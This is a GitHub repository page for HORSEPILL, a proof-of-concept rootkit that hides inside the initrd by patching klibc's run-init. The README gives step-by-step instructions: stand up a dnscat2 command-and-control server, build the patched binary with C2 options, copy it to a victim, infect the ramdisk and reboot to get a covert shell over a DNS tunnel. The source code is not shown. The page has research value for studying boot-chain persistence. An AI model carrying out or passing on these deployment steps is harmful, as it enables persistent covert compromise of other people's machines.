Skip to content

r00tkillah/HORSEPILL

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
.gitignore
.gitignore
 
 
LICENSE.md
LICENSE.md
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
banner.h
banner.h
 
 
dnscat2-LICENSE.md
dnscat2-LICENSE.md
 
 
horsepill_install.c
horsepill_install.c
 
 
horsepill_setopt
horsepill_setopt
 
 
infect.c
infect.c
 
 
infect.h
infect.h
 
 
klibc-horsepill.patch
klibc-horsepill.patch
 
 
klibc-usr-LICENSE
klibc-usr-LICENSE
 
 

Repository files navigation

HORSE PILL

Horse Pill is a PoC of a ramdisk based containerizing root kit. It resides inside the initrd, and prior to the actual init running, it puts it into a mount and pid namespace that allows it to run covert processes and covert storage. This also allows it run covert networking systems, such as dns tunnels.

The Moving Parts

There are essentially 3 moving parts here.

klibc-horsepill.patch

This is patch to klibc, which provides run-init, which on modern Ubuntu systems runs the real init, systemd. This patches in the rootkit functionality, making a malicious run-init. This binary has a new section called DNSCMDLINE, which provides the command line options to dnscat, which is bundled within the patch.

horsepill_setopt

This script takes in command-line arguments and puts them into the section referred to above.

horsepill_infect

This will takes the file to splat over run-init while assembling ramdisks as a command line argument. It then calls update-initramfs and splats over the run-init as the ramdisks is being assembled.

How to Play

  1. Set up your dns records for the command and control box as directed by the dnscat2 documentation
  2. Get a server on the internet and run the dnscat server on it 
    ruby dnscat.rb --secret=<secret> some.domain.name
  3. Grab the source for klibc on your attack system. If apt complains that you don't have source repositories, fix it 
    sudo apt-get build-dep klibc && apt-get source klibc
  4. build 
    cd klibc-2.xx && quilt import klibc-horsepill.patch && dpkg-buildpackage -j$(nproc) -us -uc
  5. Take that binary and set your options 
    horsepill_setopt path/to/klibc/source/package/usr/kinit/shared/run-init dsncat --secret=<secret> some.domain.name
  6. Copy malicious run-init to victim and horsepill_infect and run

horsepill_infect run-init ``` 7. Reboot victim 8. ??? 9. Enjoy your shell 10. Disable on victim by adding "horsepill=0" to kernel command line at boot

Contributing

Pull requests reviewed and accepted. Rather than contributing directly to this project, why not contribute to distros and stop them from assembling ramdisks on most systems. Or contribute to systemd to detect this as a type of containment. Or perhaps to chrootkit.

Authors

This was developed by Michael Leibowitz (@r00tkillah)

License

All parts are licensed BSD. Klibc is actually dual licensed depending on the part of klibc, but the usr components are BSD licensed. dnscat2 is also BSD licensed. Both components have their licenses here as well as klibc-usr-LICENSE.md and danscat2-LICENSE.md. The combination is covered under the LICENSE.md

Acknowledgments

Thanks Ron Bowes, the developer of dnscat2 for his fine tool.

About

HORSEPILL rootkit PoC

Resources

Readme

License

BSD-2-Clause, BSD-3-Clause licenses found

Licenses found

BSD-2-Clause
LICENSE.md
BSD-3-Clause
dnscat2-LICENSE.md
Activity

Stars

222 stars

Watchers

22 watching

Forks

70 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages